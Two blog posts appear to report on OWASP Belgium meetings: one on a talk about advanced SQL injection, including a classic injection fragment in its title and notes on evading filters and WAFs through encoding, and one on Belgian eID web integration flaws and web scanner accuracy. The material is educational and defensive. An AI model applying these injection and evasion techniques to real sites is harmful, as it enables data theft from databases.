OWASP BE Meeting about SQL Injections’ OR 2=2;

June 16, 2010 21:18 | Leave a Comment |

Joe Mc Cray / OWASPSurprise! The OWASP Belgian Chapter sent a late notification to announce an extra chapter meeting with a special guest: Joe McCray from Learn Security Online. Today’ topic was “Advanced SQL injections“. Joe is a well known security specialist with high skills in penetration tests. He was in Belgium to provide trainings and it was a good opportunity to invite him.Thanks to OWASP-BE!

[Note: Joe will give a training during the 2nd edition of BruCON in September: "Pentesting High Security Environments". If you are interested, more details are available here]

Only a few people were present tonight, I suppose due to the late notification. Too bad because Joe’s presentation was really cool. First, he makes the show! He is not afraid to say what he thinks with his own words. I should count the number of times he said “Fix your shit!;-)

The presentation started with small examples of basic SQL injections: Just by adding an extra single quote to an URL, it’s possible to detect if the site is vulnerable or not. An important remark about the database enumeration process: if you detect that your database server contains a lot of DB, there is maybe a shared environment available somewhere. Remember that, even if your site is bullet-proof (ok, ok, none are), your security may be affected by a neighbor site which is badly protected. Keep this in mind!

To resume briefly, SQL injection attacks are based on a three steps process:

  • Identify the target (enumeration, version disclosure, etc)
  • Define how to attack
  • Protect yourself to not be caught!

There are three classes of SQL injections:

  • Inbound (the same channel is used to send the attack and get the results)
  • Out of band (data are retrieved using a different channel)
  • Inferential (there is no data returned to the attacker, just the website behavior which is affected – example using timeouts)

Joe also explained how it is possible to grab interesting data like user names, db names, version or path using the UNION syntax. The queries became more and more complex but, with some exercises, it will become a simple brain mechanism. After the offensive part, he reviewed the defensive part and the classic mistakes to avoid:

  • Client side filtering?
  • Restrictive blacklists?
  • Signature based IDS?

Forget them! It’s easy to bypass those countermeasures, often just be changing the encoding or due to stupid rules. The next step was a brief introduction on techniques to detect IDS and WAF (“Web Application Firewall“). Those systems suffer from a major lack of decoding. In the worst case, they don’t support extra encoding (like HEX, UTF etc..) or they just support a few of them. Why? Because decoding the URLs against all the methods requires a lot of CPU cycles. A WAF can only be considered as a temporary fix until the detected issue has been fixed by the developers. About the developers, Joe suggests to report all the security holes as regular “bugs”. Developers are not aware of security but they are “bug hunters”.

After the presentation, an relaxed informal discussion continued over several security topics. It was interesting to compare the security landscapes in Europe and in the United States.

Related sites:

Posted in: Belgium, Event, Security | Tagged: , , , , ,

OWASP Belgium Chapter Meeting Wrap Up

June 1, 2010 23:26 | Leave a Comment |

OWASP Belgium Chapter MeetingI’m back from the latest OWASP Belgium Chapter meeting. Belgium is a small country with lot of political issues (off-topic here ;-) ) but also a great electronic identify card or “eID“. Almost all Belgian citizens have an eID for a while (8.2 millions of cards have been delivered up to today). Coupled with a PIN code, the card can be used for several purpose:

  • To identify the owner;
  • To authenticate the owner (using the PIN code);
  • To sign documents

Of course, the eID can be used online with compatible websites. This was the first topic covered tonight. Erwin Geirnaert and Frank Cornelis presented “The Belgian e-ID: hacker vs developer“. The second part was performed by Larry Suto about the accuracy of web application scanners.

Frank started with a deep technical presentation of the Belgian eID card (from the physical structure, the data contained on it and the software used to access them). Event if the card has information written on it, other information are only available on the chipset (like the home address). The card contains PKI elements (RSA keys), the owner picture, an identity file, address file and a PKCS#15 structure. The Belgian authorities operate a PKI-infrastructure to work with the eID. Some actions are available without authentication like the basic identification. Just insert your card in a compatible reader and your data are available to everyone. On the other side, to be authenticated (to prove that you are really the owner of the card), you need to give a PIN code (two-factors authentication). The same apply to digitally signed documents. Then Frank explained how to integrate the eID in web applications. The requirements are:

  • It must be easy;
  • It must be secure (of course!);
  • It must be platform independent (operating systems & browsers);
  • And… idiot proof!

Don’t forget that everybody has an eID and not all people are security experts! (even if some pretend to be ;-) ). The latest eID applet is based on Java 6 and does not require any installation on the user side. If you are interested, the code is available on Google Code under the GPLv3 license. One of the remaining problem is the risk of stolen PIN code via key loggers. That’s why some critical applications require a specific card-reader with a built-in keypad. The new applet also implements an integrity control which prevent data read from the card to be altered by a MitM attack. About the digital signature feature, two types of documents/applications are supported: OpenOffice and Microsoft Office.

After the technical details about implementing the eID within the web applications, Erwin “the bad guy” given some bad examples. First, the implemetation of the eID into the web sites will not protect you against the classic web vulnerabilities! It’s just a new way to authenticate the users. Keep your developers aware of this. What are the common bad implementations?

  • Identification is not the same as authorization! (just inserting your card is not a safe way to authenticate you)
  • No implementation of the HTTPS protocol! The eID data can be sniffed!
  • Using an unsecured trust in a 3rd party product (like in the Drupal case)
  • Data automatically intercepted by a reverse proxy (and forwarded in clear text)
  • After a successful authentication, usage of a cookie to keep the session alive.

Frank performed some demonstrations using Webscarab and demonstrated how it is easy to capture and change the eID data on the fly (without integrity verification of course). Note that a nice project is ongoing: an official validation of web sites providing eID authentication? (via L-SEC).

The second part of the meeting was dedicated to Larry Suto from Strategic Data Command. Larry tested several web scanners and tested their accuracy. He presented a summary of his report. The study focused on four points:

  • The accuracy of the scanners using a “point & shoot” configuration (or “out-of-the-box”);
  • The accuracy of the scanners using a fine-tuned configuration;
  • The accuracy of the reported vulnerabilities;
  • And the time required to ensure quality results

He performed his tests using commercial solutions (Acunetix, Appscan, Burpsuite Pro, Hailstorm, NTOspider, Qualys and Webinspect). The tested web sites were those provided by the solution developers themselves. Here are some facts discovered by Larry:

  • Each scanner is different in the way it performs the scans;
  • Scanners did not work best against their own test server;
  • Point & shoot configurations: lot of problems with badly managed authentication;
  • The web site language can be an issue in false positives: Look at non English sites? (Example: “error” – “faut” – “erreur”);
  • Scanning in the cloud (ex: Qualys) is limited in features (like JavaScript support)

In a new version of the report, some open source scanners will maybe be added like Skipfish or w3af. But at the moment, they give poor results compared to the commercial solutions.

The job performed by web app scanners is difficult compared to the classic vulnerability scans. In this case, there is notsimple signature or patterns to detect. A lot of actions must be performed from a human point of view. That’s why the web scanners users can be grouped in two categories: A first one which find the “point & shoot” operating mode enough to reach their expected security level). The second one thinks that no automatic scanning can be used due to the complexity of modern web sites.

Note to Larry: what about a “webscannertotal.com” like virustotal.com where we could test the same web site against several scanners at the same time ? :-)

According to the audience (the room was full of known and unknown faces), OWASP meetings have more and more success in Belgium. That’s good!

Posted in: Belgium, Event, Security | Tagged: , , , ,